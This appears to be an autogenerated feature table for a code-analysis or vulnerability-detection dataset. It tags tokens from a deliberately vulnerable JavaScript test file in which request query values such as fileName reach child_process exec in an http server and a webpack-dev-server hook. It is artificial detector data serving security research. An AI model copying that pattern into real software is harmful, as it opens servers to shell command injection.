autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:34:73:37 | true | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:40:73:44 | query | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:40:73:44 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:40:73:44 | query | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:40:73:44 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:40:73:44 | query | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:46:73:49 | path | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:46:73:49 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:46:73:49 | path | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:46:73:49 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:73:46:73:49 | path | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:8 | util | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:8 | util | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:8 | util | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:8 | util | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:8 | util | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:18 | util.promisify | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:18 | util.promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:18 | util.promisify | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:18 | util.promisify | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:18 | util.promisify | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | exceptional return of util.pr ... p.exec) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | exceptional return of util.pr ... p.exec) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | exceptional return of util.pr ... p.exec) | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | exceptional return of util.pr ... p.exec) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | exceptional return of util.pr ... p.exec) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | util.pr ... p.exec) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | util.pr ... p.exec) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | util.pr ... p.exec) | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | util.pr ... p.exec) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:27 | util.pr ... p.exec) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | exceptional return of util.pr ... c)(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | exceptional return of util.pr ... c)(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | exceptional return of util.pr ... c)(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | exceptional return of util.pr ... c)(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | exceptional return of util.pr ... c)(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | util.pr ... c)(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | util.pr ... c)(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | util.pr ... c)(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | util.pr ... c)(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:5:75:32 | util.pr ... c)(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:10:75:18 | promisify | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:10:75:18 | promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:10:75:18 | promisify | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:10:75:18 | promisify | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:10:75:18 | promisify | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:21 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:21 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:21 | cp | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:21 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:21 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | CalleeFlexibleAccessPath | util.promisify | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:20:75:26 | cp.exec | receiverName | util | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:23:75:26 | exec | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:23:75:26 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:23:75:26 | exec | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:23:75:26 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:23:75:26 | exec | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | CalleeFlexibleAccessPath | util.promisify() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | calleeImports | util | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path util promisify cp exec cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:75:29:75:31 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:22 | webpackDevServer | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:22 | webpackDevServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:22 | webpackDevServer | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:54 | webpack ... erver') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:54 | webpack ... erver') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:54 | webpack ... erver') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:54 | webpackDevServer | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:54 | webpackDevServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:7:79:54 | webpackDevServer | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:32 | require | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:32 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:32 | require | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | exceptional return of require ... erver') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | exceptional return of require ... erver') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | exceptional return of require ... erver') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | require ... erver') | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | require ... erver') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:26:79:54 | require ... erver') | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:34:79:53 | 'webpack-dev-server' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:34:79:53 | 'webpack-dev-server' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:34:79:53 | 'webpack-dev-server' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:34:79:53 | 'webpack-dev-server' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:34:79:53 | 'webpack-dev-server' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:79:34:79:53 | 'webpack-dev-server' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:1:88:2 | exceptional return of new web ... }\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:1:88:2 | exceptional return of new web ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:1:88:2 | exceptional return of new web ... }\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:1:88:2 | new web ... }\\n}) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:1:88:2 | new web ... }\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:1:88:2 | new web ... }\\n}) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:5:80:20 | webpackDevServer | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:5:80:20 | webpackDevServer | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:5:80:20 | webpackDevServer | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:22:80:29 | compiler | CalleeFlexibleAccessPath | webpackDevServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:22:80:29 | compiler | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:22:80:29 | compiler | calleeImports | webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:22:80:29 | compiler | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:22:80:29 | compiler | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:22:80:29 | compiler | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:32:88:1 | {\\n b ... }\\n} | CalleeFlexibleAccessPath | webpackDevServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:32:88:1 | {\\n b ... }\\n} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:32:88:1 | {\\n b ... }\\n} | calleeImports | webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:32:88:1 | {\\n b ... }\\n} | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:32:88:1 | {\\n b ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:80:32:88:1 | {\\n b ... }\\n} | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:81:10 | before | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:81:10 | before | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:81:10 | before | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:87:5 | before: ... ;\\n } | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:87:5 | before: ... ;\\n } | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:87:5 | before: ... ;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:87:5 | before: ... ;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:87:5 | before: ... ;\\n } | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:5:87:5 | before: ... ;\\n } | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:81:12 | this | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:81:12 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:81:12 | this | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:81:12 | this | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:81:12 | this | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | 'arguments' object of method before | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | 'arguments' object of method before | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | 'arguments' object of method before | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | 'arguments' object of method before | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | 'arguments' object of method before | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | exceptional return of method before | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | exceptional return of method before | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | exceptional return of method before | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | exceptional return of method before | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | exceptional return of method before | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | CalleeFlexibleAccessPath | webpackDevServer | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | InputAccessPathFromCallee | ?.before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | assignedToPropName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | calleeImports | webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | contextSurroundingFunctionParameters | (app) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | functio ... ;\\n } | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | return of method before | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | return of method before | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | return of method before | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | return of method before | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:13:87:5 | return of method before | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | contextSurroundingFunctionParameters | (app) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:81:23:81:25 | app | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:11 | app | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:11 | app | contextSurroundingFunctionParameters | (app) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:11 | app | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:11 | app | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:11 | app | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:15 | app.use | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:15 | app.use | contextSurroundingFunctionParameters | (app) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:15 | app.use | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:15 | app.use | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:82:15 | app.use | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | app.use ... }) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | app.use ... }) | contextSurroundingFunctionParameters | (app) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | app.use ... }) | enclosingFunctionBody | app app use req res next cp exec req query fileName require my-sub-lib foo req query fileName | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | app.use ... }) | enclosingFunctionName | before | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | app.use ... }) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | exceptional return of app.use ... }) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:82:9:86:10 | exceptional return of app.use ... }) | contextSurroundingFunctionParameters | | +| 